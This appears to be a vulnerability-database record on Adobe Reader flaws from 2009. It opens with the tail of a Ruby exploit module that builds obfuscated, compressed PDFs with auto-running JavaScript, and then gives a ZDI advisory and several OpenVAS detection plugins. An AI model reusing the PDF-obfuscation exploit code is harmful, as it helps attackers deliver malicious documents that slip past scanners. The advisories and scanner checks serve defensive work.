\nend \n \ndef RandomNonASCIIString(count) \nresult = \"\" \ncount.times do \nresult << (rand(128) + 128).chr \nend \nresult \nend \n \ndef ioDef(id) \n\"%d 0 obj\" % id \nend \n \ndef ioRef(id) \n\"%d 0 R\" % id \nend \n \n#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/ \ndef nObfu(str) \nresult = \"\" \nstr.scan(/./u) do |c| \nif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z' \nresult << \"#%x\" % c.unpack(\"C*\")[0] \nelse \nresult << c \nend \nend \nresult \nend \n \ndef ASCIIHexWhitespaceEncode(str) \nresult = \"\" \nwhitespace = \"\" \nstr.each_byte do |b| \nresult << whitespace << \"%02x\" % b \nwhitespace = \" \" * (rand(3) + 1) \nend \nresult << \">\" \nend \n \ndef make_pdf(js) \n \nxref = [] \neol = \"\\x0d\\x0a\" \nendobj = \"endobj\" << eol \n \n# Randomize PDF version? \npdf = \"%%PDF-%d.%d\" % [1 + rand(2), 1 + rand(5)] << eol \npdf << \"%\" << RandomNonASCIIString(4) << eol \nxref << pdf.length \npdf << ioDef(1) << nObfu(\"<</Type/Catalog/Outlines \") << ioRef(2) << nObfu(\"/Pages \") << ioRef(3) << nObfu(\"/OpenAction \") << ioRef(5) << \">>\" << endobj \nxref << pdf.length \npdf << ioDef(2) << nObfu(\"<</Type/Outlines/Count 0>>\") << endobj \nxref << pdf.length \npdf << ioDef(3) << nObfu(\"<</Type/Pages/Kids[\") << ioRef(4) << nObfu(\"]/Count 1>>\") << endobj \nxref << pdf.length \npdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3) << nObfu(\"/MediaBox[0 0 612 792]>>\") << endobj \nxref << pdf.length \npdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << endobj \nxref << pdf.length \ncompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js)) \npdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol \npdf << \"stream\" << eol \npdf << compressed << eol \npdf << \"endstream\" << eol \npdf << endobj \nxrefPosition = pdf.length \npdf << \"xref\" << eol \npdf << \"0 %d\" % (xref.length + 1) << eol \npdf << \"0000000000 65535 f\" << eol \nxref.each do |index| \npdf << \"%010d 00000 n\" % index << eol \nend \npdf << \"trailer\" << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol \npdf << \"startxref\" << eol \npdf << xrefPosition.to_s() << eol \npdf << \"%%EOF\" << eol \n \nend \n \nend \n`\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/83139/adobe_geticon.rb.txt"}], "zdi": [{"lastseen": "2016-11-09T00:18:05", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a malicious file.\n\nThe specific flaw exists when processing malicious JavaScript contained in a PDF document. When supplying a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow. If successfully exploited full control of the affected machine running under the credentials of the currently logged in user can be achieved.", "modified": "2009-11-09T00:00:00", "published": "2009-03-24T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-09-014", "id": "ZDI-09-014", "title": "Adobe Acrobat getIcon() Stack Overflow Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2019-05-29T18:40:23", "bulletinFamily": "scanner", "description": "This host has Adobe Reader installed, and is prone to buffer overflow\nvulnerability.", "modified": "2019-04-29T00:00:00", "published": "2009-03-03T00:00:00", "id": "OPENVAS:1361412562310900321", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900321", "title": "Buffer Overflow Vulnerability in Adobe Reader (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Buffer Overflow Vulnerability in Adobe Reader (Linux)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:adobe:acrobat_reader\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900321\");\n script_version(\"2019-04-29T15:08:03+0000\");\n script_cve_id(\"CVE-2009-0658\", \"CVE-2009-0927\");\n script_bugtraq_id(33751, 34169, 34229);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-04-29 15:08:03 +0000 (Mon, 29 Apr 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-03-03 06:56:37 +0100 (Tue, 03 Mar 2009)\");\n script_name(\"Buffer Overflow Vulnerability in Adobe Reader (Linux)\");\n\n\n script_tag(name:\"summary\", value:\"This host has Adobe Reader installed, and is prone to buffer overflow\nvulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"This issue is due to error in array indexing while processing JBIG2 streams\nand unspecified vulnerability related to a JavaScript method.\");\n script_tag(name:\"impact\", value:\"This can be exploited to corrupt arbitrary memory via a specially crafted PDF\nfile, related to a non-JavaScript function call and to execute arbitrary code\nin context of the affected application.\");\n script_tag(name:\"affected\", value:\"Adobe Reader version 9.x < 9.1, 8.x < 8.1.4, 7.x < 7.1.1 on Linux\");\n script_tag(name:\"solution\", value:\"Upgrade to Adobe Reader version 9.1 or 8.1.4 or later.\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33901\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-03.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-04.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa09-01.html\");\n script_xref(name:\"URL\", value:\"http://downloads.securityfocus.com/vulnerabilities/exploits/33751-PoC.pl\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/downloads/product.jsp?product=10&platform=Unix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"gb_adobe_prdts_detect_lin.nasl\");\n script_mandatory_keys(\"Adobe/Reader/Linux/Version\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!readerVer = get_app_version(cpe:CPE))\n exit(0);\n\nif(readerVer =~ \"^[7-9]\\.\")\n{\n if(version_in_range(version:readerVer, test_version:\"7.0\", test_version2:\"7.1.0\")||\n version_in_range(version:readerVer, test_version:\"8.0\", test_version2:\"8.1.3\")||\n readerVer =~ \"^9\\.0\")\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-04-06T11:39:34", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200904-17.", "modified": "2018-04-06T00:00:00", "published": "2009-04-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063853", "id": "OPENVAS:136141256231063853", "type": "openvas", "title": "Gentoo Security Advisory GLSA 200904-17 (acroread)", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Reader is vulnerable to execution of arbitrary code.\";\ntag_solution = \"All Adobe Reader users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-8.1.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200904-17\nhttp://bugs.gentoo.org/show_bug.cgi?id=259992\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200904-17.\";\n\n \n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63853\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200904-17 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 8.1.4\"), vulnerable: make_list(\"lt 8.1.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:56", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.", "modified": "2017-07-11T00:00:00", "published": "2009-03-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63686", "id": "OPENVAS:63686", "title": "SuSE Security Advisory SUSE-SA:2009:014 (acroread)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_014.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:014 (acroread)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\nPlease find more details at Adobe's site:\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html\n\nNote that Adobe did not provide updates for Adobe Reader 7 as used\non NLD9. We cannot upgrade to newer versions due to library\ndependencies. We strongly encourage users of acroread on NLD9 to\nuninstall the package and to use an alternative, open source pdf\nviewer instead. We're currently evaluating the possibility of\ndisabling acroread on NLD9 via online update.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:014\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.\";\n\n \n\nif(description)\n{\n script_id(63686);\n script_version(\"$Revision: 6668 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-11 15:34:29 +0200 (Tue, 11 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:014 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-08-06T13:17:35", "bulletinFamily": "scanner", "description": "This host has Adobe Acrobat or Adobe Reader installed, and is prone to buffer\n overflow vulnerability.", "modified": "2019-08-05T00:00:00", "published": "2009-03-03T00:00:00", "id": "OPENVAS:1361412562310900320", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310900320", "title": "Buffer Overflow Vulnerability in Adobe Acrobat and Reader (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Buffer Overflow Vulnerability in Adobe Acrobat and Reader (Windows)\n#\n# Authors:\n# Sharath S <sharaths@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2009 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.900320\");\n script_version(\"2019-08-05T07:17:10+0000\");\n script_cve_id(\"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0193\", \"CVE-2009-0928\",\n \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_bugtraq_id(33751, 34169, 34229);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-08-05 07:17:10 +0000 (Mon, 05 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2009-03-03 06:56:37 +0100 (Tue, 03 Mar 2009)\");\n script_name(\"Buffer Overflow Vulnerability in Adobe Acrobat and Reader (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host has Adobe Acrobat or Adobe Reader installed, and is prone to buffer\n overflow vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This issue is due to error in array indexing while processing JBIG2 streams\n and unspecified vulnerability related to a JavaScript method.\");\n\n script_tag(name:\"impact\", value:\"This can be exploited to corrupt arbitrary memory via a specially crafted PDF\n file, related to a non-JavaScript function call and to execute arbitrary code\n in context of the affected application.\");\n\n script_tag(name:\"affected\", value:\"Adobe Reader/Acrobat version 9.x < 9.1, 8.x < 8.1.4, 7.x < 7.1.1 on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Reader/Acrobat version 9.1 or 7.1.1 or 8.1.4 or later.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/33901\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-03.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/bulletins/apsb09-04.html\");\n script_xref(name:\"URL\", value:\"http://www.adobe.com/support/security/advisories/apsa09-01.html\");\n script_xref(name:\"URL\", value:\"http://downloads.securityfocus.com/vulnerabilities/exploits/33751-PoC.pl\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 SecPod\");\n script_family(\"Buffer overflow\");\n script_dependencies(\"secpod_adobe_prdts_detect_win.nasl\");\n script_mandatory_keys(\"Adobe/Air_or_Flash_or_Reader_or_Acrobat/Win/Installed\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nCPE = \"cpe:/a:adobe:acrobat_reader\";\nif(readerVer = get_app_version(cpe:CPE, nofork:TRUE))\n{\n if(readerVer =~ \"^[7-9]\\.\")\n {\n if(version_in_range(version:readerVer, test_version:\"7.0\", test_version2:\"7.1.0\")||\n version_in_range(version:readerVer, test_version:\"8.0\", test_version2:\"8.1.3\")||\n readerVer =~ \"^9\\.0\"){\n report = report_fixed_ver(installed_version:readerVer, fixed_version:\"9.1/7.1.1/8.1.4\");\n security_message(port:0, data:report);\n }\n }\n}\n\nCPE = \"cpe:/a:adobe:acrobat\";\nif(acrobatVer = get_app_version(cpe:CPE))\n{\n if(acrobatVer =~ \"^[7-9]\\.\")\n {\n if(version_in_range(version:acrobatVer, test_version:\"7.0\", test_version2:\"7.1.0\")||\n version_in_range(version:acrobatVer, test_version:\"8.0\", test_version2:\"8.1.3\")||\n acrobatVer =~ \"^9\\.0\")\n {\n report = report_fixed_ver(installed_version:acrobatVer, fixed_version:\"9.1/7.1.1/8.1.4\");\n security_message(port:0, data:report);\n exit(0);\n }\n }\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-07-24T12:56:52", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200904-17.", "modified": "2017-07-07T00:00:00", "published": "2009-04-20T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63853", "id": "OPENVAS:63853", "title": "Gentoo Security Advisory GLSA 200904-17 (acroread)", "type": "openvas", "sourceData": "#\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Adobe Reader is vulnerable to execution of arbitrary code.\";\ntag_solution = \"All Adobe Reader users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=app-text/acroread-8.1.4'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200904-17\nhttp://bugs.gentoo.org/show_bug.cgi?id=259992\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200904-17.\";\n\n \n \n\nif(description)\n{\n script_id(63853);\n script_version(\"$Revision: 6595 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:19:55 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-04-20 23:45:17 +0200 (Mon, 20 Apr 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Gentoo Security Advisory GLSA 200904-17 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"app-text/acroread\", unaffected: make_list(\"ge 8.1.4\"), vulnerable: make_list(\"lt 8.1.4\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:26", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.", "modified": "2018-04-06T00:00:00", "published": "2009-03-31T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231063686", "id": "OPENVAS:136141256231063686", "type": "openvas", "title": "SuSE Security Advisory SUSE-SA:2009:014 (acroread)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sa_2009_014.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory SUSE-SA:2009:014 (acroread)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Multiple flaws in the JBIG2 decoder and the JavaScript engine of the\nAdobe Reader allowed attackers to crash acroread or even execute\narbitrary code by tricking users into opening specially crafted PDF\nfiles.\n\nPlease find more details at Adobe's site:\nhttp://www.adobe.com/support/security/bulletins/apsb09-04.html\n\nNote that Adobe did not provide updates for Adobe Reader 7 as used\non NLD9. We cannot upgrade to newer versions due to library\ndependencies. We strongly encourage users of acroread on NLD9 to\nuninstall the package and to use an alternative, open source pdf\nviewer instead. We're currently evaluating the possibility of\ndisabling acroread on NLD9 via online update.\";\ntag_solution = \"Update your system with the packages as indicated in\nthe referenced security advisory.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=SUSE-SA:2009:014\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory SUSE-SA:2009:014.\";\n\n \n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.63686\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-03-31 19:20:21 +0200 (Tue, 31 Mar 2009)\");\n script_cve_id(\"CVE-2009-0193\", \"CVE-2009-0658\", \"CVE-2009-0927\", \"CVE-2009-0928\", \"CVE-2009-1061\", \"CVE-2009-1062\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"SuSE Security Advisory SUSE-SA:2009:014 (acroread)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1.1\", rls:\"openSUSE11.1\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE11.0\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"acroread\", rpm:\"acroread~8.1.4~0.1\", rls:\"openSUSE10.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-26T08:55:42", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory SUSE-SR:2009:009. SuSE Security Summaries are short\non detail when it comes to the names of packages affected by\na particular bug. Because of this, while this test will detect\nout of date packages, it cannot tell you what bugs impact\nwhich packages, or vice versa.", "modified": "2017-07-11T00:00:00", "published": "2009-04-28T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=63891", "id": "OPENVAS:63891", "title": "SuSE Security Summary SUSE-SR:2009:009", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: suse_sr_2009_009.nasl 6668 2017-07-11 13:34:29Z cfischer $\n# Description: Auto-generated from advisory SUSE-SR:2009:009\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 